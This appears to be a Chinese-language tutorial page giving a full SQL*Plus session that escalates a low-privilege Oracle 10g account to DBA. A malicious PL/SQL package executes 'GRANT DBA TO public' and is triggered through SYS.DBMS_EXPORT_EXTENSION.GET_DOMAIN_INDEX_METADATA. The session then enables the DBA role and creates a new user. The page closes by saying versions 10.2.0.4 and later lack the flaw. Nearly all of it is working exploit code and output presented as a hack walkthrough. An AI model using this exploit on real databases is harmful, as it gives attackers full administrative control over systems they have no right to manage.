Oracle特权提升-mysql教程

以下为hack过程 Microsoft Windows [版本 5.2.3790] C:\Documents and Settings\Administratorsqlplus scott/tiger SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 9月 23 23:07:17 2013 Copyright (c) 1982, 2005, Oracle. All rights reserved. 连

以下为hack过程

Microsoft Windows [版本 5.2.3790]

C:\Documents and Settings\Administrator>sqlplus scott/tiger


SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 9月 23 23:07:17 2013


Copyright (c) 1982, 2005, Oracle. All rights reserved.




连接到:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning, OLAP and Data Mining options


SQL> select * from session_privs;


PRIVILEGE
--------------------------------------------------------------------------------
CREATE SESSION
CREATE TABLE
CREATE CLUSTER
CREATE SEQUENCE
CREATE PROCEDURE
CREATE TRIGGER
CREATE TYPE
CREATE OPERATOR
CREATE INDEXTYPE


已选择9行。


SQL> CREATE OR REPLACE
2 PACKAGE MYBADPACKAGE authid current_user
3 IS
4 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
5 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
6 RETURN NUMBER;
7 END;
8 /


程序包已创建。


SQL> CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
2 IS
3 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
4 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
5 RETURN NUMBER
6 IS
7 BEGIN
8 EXECUTE IMMEDIATE 'GRANT DBA TO public';
9 RETURN 1;
10 EXCEPTION WHEN OTHERS THEN
11 EXECUTE IMMEDIATE 'GRANT DBA TO public';
12 return 1;
13 END;
14 END;
15 /


程序包体已创建。


SQL> DECLARE
2 INDEX_NAME VARCHAR2(200);
3 INDEX_SCHEMA VARCHAR2(200);
4 TYPE_NAME VARCHAR2(200);
5 TYPE_SCHEMA VARCHAR2(200);
6 VERSION VARCHAR2(200);
7 NEWBLOCK PLS_INTEGER;
8 GMFLAGS NUMBER;
9 v_Return VARCHAR2(200);
10 BEGIN
11 INDEX_NAME := 'A1'; INDEX_SCHEMA := 'SCOTT';
12 TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'SCOTT';
13 VERSION := '10.2.0.1.0'; GMFLAGS := 1;
14 v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
15 INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
16 => TYPE_NAME,
17 TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
18 NEWBLOCK, GMFLAGS => GMFLAGS
19 );
20 END;
21 /


PL/SQL 过程已成功完成。


SQL> create user qwe identified by qwe;
create user qwe identified by qwe
*
第 1 行出现错误:
ORA-01031: 权限不足




SQL> set role dba
2 /


角色集


SQL> create user qwe identified by qwe;


用户已创建。


SQL> select * from session_privs;


PRIVILEGE
--------------------------------------------------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER


PRIVILEGE
--------------------------------------------------------------------------------
BECOME USER
.......

经测试，oracle10.2.0.4以上版本没这个安全漏洞